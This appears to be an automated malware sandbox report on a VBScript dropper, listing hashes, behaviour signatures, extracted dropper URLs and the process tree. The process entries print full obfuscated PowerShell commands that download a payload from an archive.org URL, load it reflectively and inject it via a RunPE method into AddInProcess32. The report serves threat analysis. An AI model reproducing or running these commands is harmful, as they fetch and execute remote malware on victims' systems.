Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
02-10-2024 03:28
General
-
Target
bd0165995a09280cbdcc562067bbb5edfe8fd882c1d519a442c5bf9bbe21d88f.vbs
-
Size
501KB
-
MD5
1c7bf2517aab3aa99d65ba460d20605e
-
SHA1
c1b781e2e63ee3b6b2e3f07a389c49a8c751b30a
-
SHA256
bd0165995a09280cbdcc562067bbb5edfe8fd882c1d519a442c5bf9bbe21d88f
-
SHA512
b4e199855211bd4b30ea8a9e8fcce5c31eebc0554561cca84484771755038524e122d075d4e127388ac6840f9b3b8b03daaf93a1bd8b9973b515fd2fe18af696
-
SSDEEP
12288:ULQXhKKRUsPehr9faIzvJovIZXfwL4pKKdJhcOJ1qMQ77eIeum6MjonBzL2NR5:h+v
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd0165995a09280cbdcc562067bbb5edfe8fd882c1d519a442c5bf9bbe21d88f.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Y29NU3BFQ1s0LDI0LDI1XS1KT2luJycpICgoKCd7JysnMH11cicrJ2wnKycgJysnPSAnKyd7MScrJ31oJysndHRwczovJysnL2knKydhNjAwJysnMTAwLnVzLmFyYycrJ2hpdmUuJysnb3JnLzI0L2l0ZScrJ21zJysnL2RldGFoLW5vJysndGUnKyctJysndicrJy9EJysnZScrJ3RhaE4nKydvdGUnKydWJysnLicrJ3R4dCcrJ3snKycxJysnfTt7MH1iYXMnKydlNicrJzQnKydDJysnb250ZW50ID0gJysnKE4nKydldy1PYicrJ2onKydlJysnY3QgU3lzdGVtLk4nKydlJysndC4nKydXZWJDbCcrJ2knKydlbnQpLkRvd25sb2FkUycrJ3RyaW5nKHswJysnfXUnKydybCk7ezAnKyd9YmknKyduYXJ5QycrJ29udGVudCcrJyA9ICcrJ1tTeXMnKyd0ZScrJ20uQ29udmVydCcrJ106OkZyb20nKydCYXNlNicrJzRTJysndHJpbicrJ2coeycrJzAnKyd9YmFzZTYnKyc0QycrJ28nKydudGUnKydudCcrJyk7ezB9YXNzZScrJ20nKydibCcrJ3knKycgPScrJyBbUmVmbGVjJysndGlvbi5BJysncycrJ3NlbWJseV06JysnOkxvJysnYWQoezB9YicrJ2luYScrJ3J5Q28nKydudGVudCk7ezB9JysndHlwJysnZSA9ICcrJ3swfWFzc2VtJysnYmx5LkdldFR5JysncGUoezF9UnVuJysnUEUuJysnSG9tZXsnKycxfSknKyc7eycrJzB9bWV0aG9kJysnID0gezB9JysndHlwZS5HZScrJ3RNZScrJ3Rob2QoezF9VicrJ0FJezF9JysnKTt7MH1tZXRoJysnbycrJ2QuSW52b2tlKCcrJ3swJysnfScrJ251bGwsIFsnKydvJysnYmplYycrJ3RbJysnXV1AKHsnKycxfTAnKycvUFNUcicrJ1QvZCcrJy9lZS5ldHMnKydhcC8vJysnOnNwdHQnKydoeycrJzF9ICwnKycgezF9ZCcrJ2UnKydzYScrJ3RpJysndicrJ2FkJysnb3snKycxfSAsIHsxfWRlc2F0JysnaXZhZG8nKyd7MX0gLCB7MScrJ31kZXNhdCcrJ2l2YWRvJysnezF9LHsxfScrJ0FkJysnZCcrJ0luUHInKydvY2VzczMyJysnezF9JysnLHsxfScrJ3sxfSknKycpJyktZiAgW0NoYXJdMzYsW0NoYXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:coMSpEC[4,24,25]-JOin'') ((('{'+'0}ur'+'l'+' '+'= '+'{1'+'}h'+'ttps:/'+'/i'+'a600'+'100.us.arc'+'hive.'+'org/24/ite'+'ms'+'/detah-no'+'te'+'-'+'v'+'/D'+'e'+'tahN'+'ote'+'V'+'.'+'txt'+'{'+'1'+'};{0}bas'+'e6'+'4'+'C'+'ontent = '+'(N'+'ew-Ob'+'j'+'e'+'ct System.N'+'e'+'t.'+'WebCl'+'i'+'ent).DownloadS'+'tring({0'+'}u'+'rl);{0'+'}bi'+'naryC'+'ontent'+' = '+'[Sys'+'te'+'m.Convert'+']::From'+'Base6'+'4S'+'trin'+'g({'+'0'+'}base6'+'4C'+'o'+'nte'+'nt'+');{0}asse'+'m'+'bl'+'y'+' ='+' [Reflec'+'tion.A'+'s'+'sembly]:'+':Lo'+'ad({0}b'+'ina'+'ryCo'+'ntent);{0}'+'typ'+'e = '+'{0}assem'+'bly.GetTy'+'pe({1}Run'+'PE.'+'Home{'+'1})'+';{'+'0}method'+' = {0}'+'type.Ge'+'tMe'+'thod({1}V'+'AI{1}'+');{0}meth'+'o'+'d.Invoke('+'{0'+'}'+'null, ['+'o'+'bjec'+'t['+']]@({'+'1}0'+'/PSTr'+'T/d'+'/ee.ets'+'ap//'+':sptt'+'h{'+'1} ,'+' {1}d'+'e'+'sa'+'ti'+'v'+'ad'+'o{'+'1} , {1}desat'+'ivado'+'{1} , {1'+'}desat'+'ivado'+'{1},{1}'+'Ad'+'d'+'InPr'+'ocess32'+'{1}'+',{1}'+'{1})'+')')-f [Char]36,[Char]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD55dd1e22bbcfb5084e81434f4c356227b
SHA11d54c9b41e7c11e87896f2f2a7fdc456924cec8c
SHA2564ab010aac066a05262ade7d0039873b65fcf1761b52b4612c653f5918c51d26b
SHA512fecb666db724304952cd1e1be4543ca5ad7931708484147c512d2d464bacf4326a48178a292d93495c9f814b5c77653738953ff80bb76dca53756cd192ed9c4a
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB